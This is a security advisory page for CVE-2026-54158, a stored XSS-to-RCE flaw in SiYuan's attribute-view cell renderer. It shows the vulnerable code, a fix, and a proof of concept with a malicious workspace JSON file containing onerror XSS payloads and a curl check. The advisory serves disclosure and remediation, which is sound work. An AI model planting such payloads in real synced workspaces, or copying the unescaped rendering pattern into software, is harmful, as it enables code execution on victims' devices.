critical

CVE-2026-54158

Go · github.com/siyuan-note/siyuan/kernel

Summary

SiYuan: Stored XSS to RCE via attribute-view cell rendering in genAVValueHTML()

Severity
critical
CVSS
9.9
EPSS
0.5% (p42)
CWE
CWE-79, CWE-1188
Also known as
GHSA-5xfx-xj4h-5p7r
Published
2026-07-10
Updated
2026-07-10

Advisory details

Summary

The attribute-view (database) cell renderer genAVValueHTML interpolates cell content raw in four of its branches: text, url, phone, and mAsset. A cell value like </textarea><img src=x onerror="..."> or "><img src=x onerror="..."> breaks out of its surrounding tag and runs arbitrary JavaScript in the renderer when the victim opens the block-attribute panel. On Electron desktop the renderer runs with nodeIntegration:true, so the XSS chains to host RCE via require('child_process'). AV files live under the workspace and ride normal sync, so an attacker with write access to any synced workspace plants the payload once and it fires on every device that opens a panel containing that row.

The kernel doesn't escape on the way in either, so the malicious cell persists byte-for-byte. There's no equivalent of the html.EscapeAttrVal call that protects block IAL attributes at kernel/model/blockial.go:261.

Companion advisory: GHSA-mvjr-vv3c-w4qv. Same workspace-sync to renderer-sink to Electron-RCE pattern in the CSS-snippet renderer, different sink file. Worth auditing for the same pattern in other renderers that pull from synced workspace data.

Details

Affected:

The sink

app/src/protyle/render/av/blockAttr.ts:68, with the unsafe branches highlighted:

export const genAVValueHTML = (value: IAVCellValue) => {
  let html = "";
  switch (value.type) {
    case "block":
      // escaped via escapeAttr — safe
      html = `<input ... value="${escapeAttr(value.block.content)}" ...>`;
      break;
    case "text":
      // value.text.content goes raw into a <textarea>
      html = `<textarea ... rows="${(value.text?.content || "").split("\n").length}" ...>${value.text?.content || ""}</textarea>`;
      break;
    case "url":
      // value.url.content goes raw into value="..." and href="..."
      html = `<input value="${value.url.content}" ...>
              <a ${value.url.content ? `href="${value.url.content}"` : ""} ...>`;
      break;
    case "phone":
      // same pattern as url
      html = `<input value="${value.phone.content}" ...>
              <a ${value.phone.content ? `href="tel:${value.phone.content}"` : ""} ...>`;
      break;
    case "mAsset":
      value.mAsset?.forEach(item => {
        if (item.type === "image") {
          // item.content raw inside aria-label
          html += `<img ... aria-label="${item.content}" src="${getCompressURL(item.content)}">`;
        } else {
          // attributes escaped, but ${item.name || item.content} text-node is raw
          html += `<span ... aria-label="${escapeAttr(item.content)}" data-name="${escapeAttr(item.name)}" data-url="${escapeAttr(item.content)}">${item.name || item.content}</span>`;
        }
      });
      break;
    // other cases use escapeHtml / escapeAttr correctly
  }
  return html;
};

escapeHtml and escapeAttr already exist and are used in the block, select, and mSelect cases. They just aren't applied in the four branches above.

Callers assign the result to innerHTML. Example, app/src/protyle/render/av/select.ts:124:

if (item.classList.contains("custom-attr__avvalue")) {
    item.innerHTML = genAVValueHTML(cellValue);
}

The write path

A grep for any HTML-escape call in kernel/model/attribute_view.go returns nothing:

grep -n 'html.Escape\|EscapeHTML\|EscapeString' kernel/model/attribute_view.go
# (no output)

For comparison, the block-IAL write path at kernel/model/blockial.go:261 applies html.EscapeAttrVal(value). The AV cell write path is missing the equivalent.

Storage and sync

AV files live at data/storage/av/<avID>.json and the repository sync picks them up the same way it does the rest of the workspace data. Any sync target propagates the malicious cell to all peers.

Suggested fix

The renderer-side fix is the more important one. escapeHtml and escapeAttr already exist in blockAttr.ts and already protect the block, select, and mSelect branches. Extend them to the rest of genAVValueHTML:

case "text":
  html = `<textarea ...>${escapeHtml(value.text?.content || "")}</textarea>`;
  break;
case "url":
  html = `<input value="${escapeAttr(value.url.content)}" ...>
          <a ${value.url.content ? `href="${escapeAttr(value.url.content)}"` : ""} ...>`;
  break;
case "phone":
  html = `<input value="${escapeAttr(value.phone.content)}" ...>
          <a ${value.phone.content ? `href="tel:${escapeAttr(value.phone.content)}"` : ""} ...>`;
  break;
case "mAsset":
  // escape item.name and item.content in the text-node positions, not just inside attributes

The mAsset image branch also interpolates item.content into the src attribute via getCompressURL. Worth rejecting javascript: and data: schemes for asset URLs while you're in there.

Backend side, defense in depth: in kernel/model/attribute_view.go:updateAttributeViewValue, call html.EscapeAttrVal(content) on the string-content cell types before persisting. This mirrors the existing protection in kernel/model/blockial.go:261. The renderer fix matters more because the backend fix doesn't retroactively neutralize payloads already sitting in synced workspaces.

PoC

Stand up SiYuan and drop a malicious AV file at workspace/data/storage/av/poc.json:

docker run -d --name siyuan-poc \
  -v ./workspace:/siyuan/workspace \
  -p 16806:6806 \
  b3log/siyuan:latest \
  --workspace=/siyuan/workspace --accessAuthCode=hunter2

Minimum viable AV JSON:

{
  "spec": 2,
  "id": "20260519999999-poctest",
  "name": "PocAV",
  "keyValues": [
    {
      "key": {"id": "...keyblok", "name": "Block", "type": "block"},
      "values": [{
        "id": "...row1blk", "keyID": "...keyblok", "blockID": "...row1blk",
        "type": "block", "isDetached": true,
        "block": {"id": "...row1blk", "content": "Row 1"}
      }]
    },
    {
      "key": {"id": "...keytext", "name": "TextField", "type": "text"},
      "values": [{
        "id": "...celltxt", "keyID": "...keytext", "blockID": "...row1blk",
        "type": "text",
        "text": {"content": "</textarea><img src=x onerror=\"window.__siyuan_av_xss='FIRED'\">"}
      }]
    },
    {
      "key": {"id": "...keyurl0", "name": "UrlField", "type": "url"},
      "values": [{
        "id": "...cellurl", "keyID": "...keyurl0", "blockID": "...row1blk",
        "type": "url",
        "url": {"content": "\"><img src=x onerror=\"window.__siyuan_av_url_xss='FIRED'\">"}
      }]
    }
  ]
}

In a real attack the file gets there via sync, not by hand.

Confirm the API returns the cell content raw:

TOKEN=$(jq -r '.api.token' workspace/conf/conf.json)

curl -s -X POST http://localhost:16806/api/av/getAttributeView \
  -H "Authorization: Token $TOKEN" \
  -d '{"id":"20260519999999-poctest"}' \
  | python3 -m json.tool | grep -E '"content":'

Output from my run on 2026-05-19:

"content": "</textarea><img src=x onerror=\"window.__siyuan_av_xss='FIRED'\">"
"content": "\"><img src=x onerror=\"window.__siyuan_av_url_xss='FIRED'\">"

References

Related advisories

Is your project exposed to this? Stateward checks every dependency on every pull request and flags it only if your code actually reaches it.

Check my repo

Summarize with AI

ChatGPTClaudePerplexity

Sources: CISA KEV (public domain), OSV.dev & GitHub Advisory Database (CC-BY-4.0), FIRST EPSS, NVD/CWE (public domain). Served live from the Stateward advisory database.